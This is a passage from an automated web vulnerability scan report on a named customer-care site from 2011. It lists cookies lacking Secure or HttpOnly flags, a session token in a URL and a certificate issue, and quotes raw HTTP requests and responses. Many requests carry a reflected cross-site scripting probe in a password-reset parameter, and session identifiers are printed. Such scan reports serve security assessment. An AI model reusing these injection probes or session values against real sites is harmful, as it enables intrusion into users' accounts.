2.6. https://my.covad.com/customercare/scripts/localAreaCommon.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/localAreaCommon.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/localAreaCommon.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"7025-1313052554000"
Last-Modified: Thu, 11 Aug 2011 08:49:14 GMT
Content-Type: text/javascript
Content-Length: 7025
Set-Cookie: PL-PROD-Host-Id=1031; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=150C865CA55252B6511165A0AFC829B2; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

function writeSource(div) {
   if (!document.getElementById) { return; }
   var o = document.getElementById(div);
   if (typeof(o) == "undefined" || o==null) { return; }
   var s = o.innerHTML;
   if (s==null |
...[SNIP]...

2.7. https://my.covad.com/customercare/scripts/localAreaValidator.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/localAreaValidator.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/localAreaValidator.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"4159-1313052556000"
Last-Modified: Thu, 11 Aug 2011 08:49:16 GMT
Content-Type: text/javascript
Content-Length: 4159
Set-Cookie: PL-PROD-Host-Id=1032; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=80D707171DEA30A5DEFB4053576907BA; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

function checkEmail (strng,fieldName,msg) {
   document.getElementById(fieldName).style.backgroundColor="#fff";
   var error="";
   var emailFilter=/^.+@.+\..{2,3}$/;
   var illegalChars= /[\/\(\)\<\>\,\;\:\\
...[SNIP]...

2.8. https://my.covad.com/customercare/scripts/progressbar.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/progressbar.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/progressbar.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"818-1313052554000"
Last-Modified: Thu, 11 Aug 2011 08:49:14 GMT
Content-Type: text/javascript
Content-Length: 818
Set-Cookie: PL-PROD-Host-Id=1030; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=A67AD24432629E4993BF586A69ADCD79; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

var progressEnd = 5;        // set to number of progress <span>'s.
var progressColor = '#008bcc';    // set to progress bar color
var progressInterval = 1000;    // set to time between updates (milli-seconds)

va
...[SNIP]...

2.9. https://my.covad.com/customercare/scripts/tabs.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/tabs.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/tabs.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"6988-1313052556000"
Last-Modified: Thu, 11 Aug 2011 08:49:16 GMT
Content-Type: text/javascript
Content-Length: 6988
Set-Cookie: PL-PROD-Host-Id=1030; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=5EBADC79E8D9EE1B19E87D475D4FF5B1; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

if (!document.getElementById) {
document.getElementById = function() { return null; }
}

var applicationcontext = "/customercare";

function clearTopMenu() {
   var uls = document.getElementsByTagN
...[SNIP]...

2.10. https://my.covad.com/customercare/scripts/wz_tooltip.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/wz_tooltip.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/wz_tooltip.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"35240-1313052556000"
Last-Modified: Thu, 11 Aug 2011 08:49:16 GMT
Content-Type: text/javascript
Content-Length: 35240
Set-Cookie: PL-PROD-Host-Id=1032; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=428F80DB0297FAB856B4A773A86F7895; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/* This notice must be untouched at all times.
Copyright (c) 2002-2008 Walter Zorn. All rights reserved.

wz_tooltip.js     v. 5.0

The latest version is available at
http://www.walterzorn.com
or http://
...[SNIP]...

2.11. https://my.covad.com/customercare/styles/login.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/styles/login.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/styles/login.css HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1381-1313052554000"
Last-Modified: Thu, 11 Aug 2011 08:49:14 GMT
Content-Type: text/css
Content-Length: 1381
Set-Cookie: PL-PROD-Host-Id=1031; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=1572324D5F324E319D0FC2DC4F1BB416; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

table#loginInfo {text-align:left;float:right;margin:0px 10px 0 0;font-family:arial;color:#333;font-size:12px;line-height:1.2em;height:57px;min-height:57px !important;}
html>body table#loginInfo {margi
...[SNIP]...

2.12. https://my.covad.com/customercare/styles/stylesheet.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/styles/stylesheet.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/styles/stylesheet.css HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"19433-1313052558000"
Last-Modified: Thu, 11 Aug 2011 08:49:18 GMT
Content-Type: text/css
Content-Length: 19433
Set-Cookie: PL-PROD-Host-Id=1031; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=05D30851405BB18C6F80BCC6DC31E23D; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*
Revised:
   - Replaced logo
   - Added 'colspan="3"' to the following <td>s
    * .headContent
    * .contentWide
   - Moved Phone Numbers link to Quick Links (added an automatic hide in the top to css--de
...[SNIP]...

2.13. https://my.covad.com/customercare/styles/tabs.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/styles/tabs.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/styles/tabs.css HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"2351-1313052552000"
Last-Modified: Thu, 11 Aug 2011 08:49:12 GMT
Content-Type: text/css
Content-Length: 2351
Set-Cookie: PL-PROD-Host-Id=1030; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=6BCB3F9E16E38A6B05BE1A3888C50C1D; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/* COLORS:
3f4041 Dark Grey
9da1a4 Leftnav Grey
cd2027 MP Red
*/
.floatNcenter {width:600px;margin:10px auto;text-align:left;}

.idBar {position:relative;font-family:arial;font-size:12px;color:#369;ma
...[SNIP]...

3. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/resetPassword.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /customercare/resetPassword.do;jsessionid=948E1DD4127CB6D261FE965929A88359 HTTP/1.1
Host: my.covad.com
Connection: keep-alive
Referer: https://my.covad.com/customercare/displayLoginAUPage.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=948E1DD4127CB6D261FE965929A88359; PL-PROD-Host-Id=1030; o_q=firsturl:https%3A//my.covad.com/customercare/displayLoginAUPage.do&urlcache:https%3A//my.covad.com/customercare/displayLoginAUPage.do&SrcID:0&referrer:&sourceid:0; cmTPSet=Y; CoreID6=60520090478713135077429&ci=90239903; 90239903_clogin=l=1313507742&v=7&e=1313509549739; cmRS=&t1=1313507742957&t2=1313507745228&t3=1313507749739&lti=1313507749739&ln=&hr=/customercare/resetPassword.do%3Bjsessionid%3D948E1DD4127CB6D261FE965929A88359&fti=&fn=loginAU%3A0%3B&ac=&fd=&uer=&fu=&pi=WEB-INF/jsp/layout/SmartBaseLayout.jsp&ho=data.coremetrics.com/eluminate%3F&ci=90239903&cjen=1

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 9754


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...

4. SSL certificate  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://my.covad.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  my.covad.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Nov 01 18:00:00 GMT-06:00 2010
Valid to:  Sun Nov 13 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

5. Cookie without HttpOnly flag set  previous  next
There are 13 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. https://my.covad.com/customercare/images/logoMegaPath_and_siteDef.png  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/images/logoMegaPath_and_siteDef.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/images/logoMegaPath_and_siteDef.png HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"8053-1313052556000"
Last-Modified: Thu, 11 Aug 2011 08:49:16 GMT
Content-Type: image/png
Content-Length: 8053
Set-Cookie: PL-PROD-Host-Id=1032; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=CD138306B1011AFF4B5BED381AC99DD7; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

.PNG
.
...IHDR.......9.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]    .\U.=U.]=O.     .. ...A.B0. _eh@.
.a9"....w\.p.......L.yN ..s02..h.....N.].?..~...W...NB.w.:...p.P.........d2.Zh...%,..
...[SNIP]...

5.2. https://my.covad.com/customercare/images/spacer.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/images/spacer.gif HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"43-1313052552000"
Last-Modified: Thu, 11 Aug 2011 08:49:12 GMT
Content-Type: image/gif
Content-Length: 43
Set-Cookie: PL-PROD-Host-Id=1030; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=97CDCD5DBCAE013E0DC2F78770290B41; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

GIF89a.............!.......,...........D..;

5.3. https://my.covad.com/customercare/scripts/coremetrics/cmdatatagutils.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/coremetrics/cmdatatagutils.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/coremetrics/cmdatatagutils.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"21594-1313052554000"
Last-Modified: Thu, 11 Aug 2011 08:49:14 GMT
Content-Type: text/javascript
Content-Length: 21594
Set-Cookie: PL-PROD-Host-Id=1030; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=B23A24C348E5BA34071D52BF925F19D7; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<!--
/*
* cmdatatagutils.js
* $Id: cmdatatagutils - 8591580 - 90239903 - 051509.txt 124873 2009-07-22 18:46:13Z jbowser $
* $Revision: 124873 $
*
* Version 4.1.0
*
* Coremetrics Tag v4.0, 8/7/
...[SNIP]...

5.4. https://my.covad.com/customercare/scripts/coremetrics/v40/eluminate.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/coremetrics/v40/eluminate.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/coremetrics/v40/eluminate.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"31901-1313052558000"
Last-Modified: Thu, 11 Aug 2011 08:49:18 GMT
Content-Type: text/javascript
Content-Length: 31901
Set-Cookie: PL-PROD-Host-Id=1032; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=34125376321BAD36D2F0EF22208BA113; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*Copyright 2000-2005,Coremetrics 4.2.9 $Revision:125424 $*/if(!cGB){var cGB=true;if(!cm_ClientID){var cm_ClientID="99999999";}if(!cm_HOST){var cm_HOST="test.coremetrics.com/cm?";}if(!cm_ClientTS){var
...[SNIP]...

5.5. https://my.covad.com/customercare/scripts/frame/global.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/frame/global.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/frame/global.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"14616-1313052554000"
Last-Modified: Thu, 11 Aug 2011 08:49:14 GMT
Content-Type: text/javascript
Content-Length: 14616
Set-Cookie: PL-PROD-Host-Id=1032; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=08415A48A55B83E022A89FB81F5047CB; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*global Constants*/
var SEARCH_FORM_NAME = "searchData";
var SEARCH_FORM_DEFAULT_RADIO = "ACCOUNTNUMBER";
var SWITCH_VISP_FORM_NAME = "switchVISP";
var WEBSITE0S_FORM = "WebsiteOSLoginData";

/* Set
...[SNIP]...

5.6. https://my.covad.com/customercare/scripts/localAreaCommon.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/localAreaCommon.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/localAreaCommon.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"7025-1313052554000"
Last-Modified: Thu, 11 Aug 2011 08:49:14 GMT
Content-Type: text/javascript
Content-Length: 7025
Set-Cookie: PL-PROD-Host-Id=1031; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=150C865CA55252B6511165A0AFC829B2; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

function writeSource(div) {
   if (!document.getElementById) { return; }
   var o = document.getElementById(div);
   if (typeof(o) == "undefined" || o==null) { return; }
   var s = o.innerHTML;
   if (s==null |
...[SNIP]...

5.7. https://my.covad.com/customercare/scripts/localAreaValidator.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/localAreaValidator.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/localAreaValidator.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"4159-1313052556000"
Last-Modified: Thu, 11 Aug 2011 08:49:16 GMT
Content-Type: text/javascript
Content-Length: 4159
Set-Cookie: PL-PROD-Host-Id=1032; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=80D707171DEA30A5DEFB4053576907BA; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

function checkEmail (strng,fieldName,msg) {
   document.getElementById(fieldName).style.backgroundColor="#fff";
   var error="";
   var emailFilter=/^.+@.+\..{2,3}$/;
   var illegalChars= /[\/\(\)\<\>\,\;\:\\
...[SNIP]...

5.8. https://my.covad.com/customercare/scripts/progressbar.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/progressbar.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

